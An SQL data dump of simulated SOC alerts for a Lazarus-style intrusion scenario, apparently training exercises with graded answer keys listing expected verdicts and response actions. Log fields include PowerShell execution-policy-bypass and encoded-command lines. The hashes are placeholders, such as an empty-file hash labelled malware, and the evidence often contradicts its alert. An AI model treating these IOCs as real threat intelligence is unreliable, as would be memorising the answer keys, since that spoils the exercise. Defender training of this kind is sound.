(1447, 'Execution of Unknown Scripts', 'medium', 'Endpoint Detection and Response (EDR) alerts', 'Suspicious script execution detected on host machine. The script is associated with Lazarus Group\'s known tactics and attempts to establish control over the system by executing hidden scripts.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T07:23:45Z\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"DESKTOP-7A9B21Q\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"process_id\":2987,\"script_name\":\"hidden_script.ps1\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File hidden_script.ps1\",\"source_ip\":\"143.110.227.12\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\hidden_script.ps1\",\"event_type\":\"script_execution\",\"malicious_indicator\":true}', '2026-03-03 22:03:46', '2026-03-05 05:23:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"143.110.227.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in previous Lazarus Group campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"hidden_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Intel\",\"verdict\":\"suspicious\",\"details\":\"Script name not commonly used in normal operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1448, 'Establishment of Persistence Mechanism', 'medium', 'System logs', 'The malware modifies startup scripts, ensuring it runs upon system boot, thereby maintaining a foothold.', 'Persistence', 'T1547.001', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-14T03:24:00Z\",\"event_type\":\"startup_script_modification\",\"host\":\"compromised-host\",\"user\":\"admin\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"malware_name\":\"Lazarus_Persistence_Tool\",\"file_modified\":\"/etc/rc.local\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"modify\",\"description\":\"Startup script modified to include malicious binary execution.\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-03 22:03:46', '2026-03-05 05:24:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Lazarus Group\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash of a known Lazarus Group persistence tool\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-03T22:56:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"},{\"timestamp\":\"2026-03-03T22:55:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"},{\"timestamp\":\"2026-03-03T22:54:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"},{\"timestamp\":\"2026-03-03T22:53:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"},{\"timestamp\":\"2026-03-03T22:52:57.377Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:24:00Z\\\",\\\"event_type\\\":\\\"startup_script_modification\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"admin\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"Lazarus_Persistence_Tool\\\",\\\"file_modified\\\":\\\"/etc/rc.local\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"modify\\\",\\\"description\\\":\\\"Startup script modified to include malicious binary execution.\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1449, 'Unauthorized Lateral Movement Attempt', 'high', 'Network traffic analysis', 'An unauthorized lateral movement attempt was detected originating from an external IP address, utilizing stolen credentials to access additional systems within the network.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-10T13:45:30Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"jdoe\",\"action\":\"login_attempt\",\"status\":\"failed\",\"hash\":\"6f5902ac237024bdd0c176cb93063dc4\",\"filename\":\"mimikatz.exe\",\"protocol\":\"SMB\",\"alert_id\":\"LTMV-2023-00045\"}', '2026-03-03 22:03:46', '2026-03-05 05:26:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal company server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit Logs\",\"verdict\":\"suspicious\",\"details\":\"Account potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"6f5902ac237024bdd0c176cb93063dc4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Mimikatz variant\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File associated with credential dumping\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1450, 'Sensitive Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) alerts', 'Finalizing their operation, Lazarus exfiltrates valuable data, including cryptocurrency wallet keys, to external servers.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"dlp-20231012-0001\",\"source_ip\":\"10.0.0.101\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"wallet_keys.txt\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"file_transfer\",\"protocol\":\"HTTPS\",\"outbound_port\":443,\"threat_actor\":\"Lazarus Group\"}', '2026-03-03 22:03:46', '2026-03-05 05:27:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wallet_keys.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive cryptocurrency wallet keys.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with recent data exfiltration attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account used in the exfiltration event.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-03T22:56:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"},{\"timestamp\":\"2026-03-03T22:55:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"},{\"timestamp\":\"2026-03-03T22:54:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"},{\"timestamp\":\"2026-03-03T22:53:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"},{\"timestamp\":\"2026-03-03T22:52:57.384Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-0001\\\",\\\"source_ip\\\":\\\"10.0.0.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"wallet_keys.txt\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outbound_port\\\":443,\\\"threat_actor\\\":\\\"Lazarus Group\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1451, 'Spear-Phishing Email Detected', 'high', 'Email security gateway logs', 'A spear-phishing email was detected targeting personnel at a cryptocurrency exchange, crafted to mimic a trusted partner.', 'Social Engineering', 'T1566.001', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-08T14:32:00Z\",\"email_id\":\"abcd1234@example.com\",\"from\":\"trustedpartner@example.com\",\"to\":\"employee@cryptoexchange.com\",\"subject\":\"Urgent: Account Verification Required\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"attachment\":\"Invoice_2023.zip\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"detected_malware\":\"CryptoCore\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\"}', '2026-03-07 00:50:13', '2026-03-09 05:48:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"trustedpartner@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain previously associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to multiple spear-phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with CryptoCore APT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Email Detected\",\"date\":\"2026-03-07T14:15:20.836Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1452, 'Malicious Document Execution', 'high', 'Endpoint protection alerts', 'Following the phishing success, a malicious document is executed on the victim\'s device, deploying malware designed to extract stored credentials.', 'Malware Deployment', 'T1203 - Exploitation for Client Execution', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-13T14:23:45Z\",\"event_id\":\"4567\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.15\",\"filename\":\"invoice_2023.docx\",\"file_hash\":\"f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\",\"user\":\"jdoe\",\"device_name\":\"JD-LAPTOP\",\"malware_family\":\"Emotet\",\"action_taken\":\"File quarantined\"}', '2026-03-07 00:50:13', '2026-03-09 05:49:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Emotet malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Protection Logs\",\"verdict\":\"suspicious\",\"details\":\"File commonly used in phishing schemes.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Emotet payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1453, 'Credential Harvesting via Password Manager Exploit', 'high', 'Password manager access logs', 'CryptoCore exploits vulnerabilities in the password manager software, siphoning off sensitive credentials for further access.', 'Credential Access', 'T1003.005', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_id\":\"PM-2023-1005-0003\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.15\",\"user\":\"jdoe\",\"filename\":\"password_manager_exploit_v2.dll\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event\":\"Unauthorized Access\",\"description\":\"Detected exploitation of password manager vulnerability using known exploit DLL.\"}', '2026-03-07 00:50:13', '2026-03-09 05:50:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"password_manager_exploit_v2.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDB\",\"verdict\":\"malicious\",\"details\":\"Exploit DLL used in targeting password managers.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exploit used by CryptoCore.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 